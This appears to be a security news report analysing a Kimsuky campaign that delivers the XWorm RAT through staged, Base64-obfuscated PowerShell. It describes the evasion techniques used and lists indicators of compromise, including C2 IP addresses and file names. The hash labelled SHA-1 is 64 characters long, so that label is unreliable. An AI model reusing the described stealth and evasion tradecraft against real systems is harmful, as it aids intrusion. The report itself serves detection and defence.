A recent technical analysis has revealed that the North Korean-linked Kimsuky APT group is actively leveraging PowerShell-based attack chains to deploy the XWorm Remote Access Trojan (RAT), among other payloads, as part of an ongoing intrusion campaign.
The attacks utilize advanced tactics, including Base64 encoding, staged payload deployment, fileless execution, and abuse of Windows native binaries (LOLBAS) to maximize stealth and evade traditional security controls.
Investigators identified two separate PowerShell payloads, both heavily obfuscated using Base64 encoding, which upon decoding, orchestrate a multi-stage infection process.
These scripts are responsible for downloading additional components including executables, archives, and disguised text files primarily from the malicious IP address 185.235.128.114, an indicator of a central command-and-control (C2) hub for the operation.
PowerShell-Driven Attack Chain
The XWorm infection flow, as reverse-engineered from sandbox analysis and process trees, begins with the execution of obfuscated PowerShell scripts.
These scripts sequentially spawn multiple cmd.exe and powershell.exe instances, leveraging legitimate Windows binaries such as csc.exe, slui.exe, and sppextcomobj.exe to blend in with regular system activity a hallmark of LOLBAS abuse.
Critical payloads are dropped into obscure directories, notably under C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\, using file extensions (.customDestinations-ms) typical for Windows Jump List metadata but repurposed by the attackers to hide malware artifacts.
These files either act as staging points or assist in evasion and persistence mechanisms.
Subsequent stages involve downloading and execution of archives (e.g., enwtsv.rar) and binaries (eworvolt.exe, enwtsv.exe), often run multiple times to ensure execution reliability or trigger various malware stages.
The scripts employ Invoke-Expression to dynamically execute decoded or downloaded PowerShell payloads, further complicating detection.
C2 Communications
Network telemetry confirms repeated communications with 185.235.128.114 for payload delivery, operational directives, and likely data exfiltration.
VirusTotal and threat intelligence platforms flag this address as associated with active malware distribution.
The PowerShell scripts also embed inline C# code using Add-Type to invoke the Windows API (ShowWindow from user32.dll), programmatically hiding PowerShell and Windows Terminal windows. This reduces the chance of discovery by users or automated defenses.
Additionally, attackers occasionally drop benign-looking decoy files (such as PDFs) and open them with default viewers to distract users while the malware executes in the background.
Event log manipulation, registry queries, and system fingerprinting are performed to aid in defense evasion and target profiling.
Parallel analysis of another PowerShell script tied to Kimsuky reveals a similar staged approach: an initial EXE dropper (orwartde.exe) fetches additional PowerShell payloads (payload_1.ps1, ov4_dd_p.txt) disguised as benign text files.
The attack chain leverages password-protected archives and local extraction utilities (like UnRAR.exe) to unpack secondary payloads, with all command execution windows hidden for stealth.
This campaign’s hallmark is its persistence mechanisms, obfuscation, and reliance on live C2 infrastructure (notably 92.119.114.128 as an alternative endpoint).
The attackers employ defense evasion through disabling Windows event logging and encoding C2 communications.
The overall methodology demonstrates a highly modular, stealthy approach, using native OS tools and dynamic payload execution to evade endpoint and network defenses.
The multi-stage PowerShell scripts act as loaders, downloaders, and orchestrators for successive malware modules, including XWorm RAT, all while maintaining a low profile on compromised systems.
Indicators of Compromise (IOC)
| Type | Value | Description |
|---|---|---|
| C2 IP Address | 185.235.128.114 | Main command-and-control server |
| C2 IP Address | 92.119.114.128 | Alternate C2 endpoint |
| SHA-1 Hash | e0564ad9157ced5ee57be9111a9e6c13eb7d4f7ecc8ce7724a55ae8428bbbc2 | Initial PowerShell script for XWorm stage |
| File Name | orwartde.exe | Kimsuky dropper EXE |
| File Name | ov4_dd_p.txt | PowerShell payload, disguised as text file |
| File Name | payload_1.ps1 | Secondary stage PowerShell script |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
